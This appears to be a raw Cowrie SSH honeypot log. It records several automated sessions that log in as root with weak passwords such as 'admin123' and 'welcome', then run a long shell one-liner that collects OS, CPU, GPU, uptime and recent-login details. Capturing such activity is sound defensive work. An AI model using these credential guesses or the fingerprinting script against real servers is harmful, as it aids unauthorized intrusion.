{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.370924Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.371470Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.372371Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.373604Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.374299Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.375035Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.376290Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.377595Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.378318Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.379032Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.379457Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.379791Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.676637Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.677502Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:19:50.678442Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.111340Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:19:51.878585Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.879425Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.880381Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.881576Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.883111Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.884419Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.885496Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.887355Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.888005Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.888720Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.889404Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.890332Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:19:51.890909Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:19:52.242843Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:19:52.243783Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:19:52.245054Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56130,"dst_ip":"1.2.3.4","dst_port":22,"session":"5daba8b9a37b","protocol":"ssh","message":"New connection: 212.227.235.229:56130 (1.2.3.4:22) [session: 5daba8b9a37b]","sensor":"my-vps","timestamp":"2025-09-08T19:21:14.739754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:21:14.871826Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:21:15.044197Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47322,"dst_ip":"1.2.3.4","dst_port":22,"session":"31cdc5131b66","protocol":"ssh","message":"New connection: 212.227.125.160:47322 (1.2.3.4:22) [session: 31cdc5131b66]","sensor":"my-vps","timestamp":"2025-09-08T19:21:16.338633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:21:16.343551Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.login.success","username":"root","password":"welcome","message":"login attempt [root/welcome] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:21:16.501104Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:21:16.653667Z","src_ip":"212.227.125.160","session":"31cdc5131b66"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:21:17.124912Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.125663Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.126374Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.127486Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.128558Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.129471Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.130594Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:21:17.131961Z","src_ip":"212.227.235.229","session":"5daba8b9a37b"}
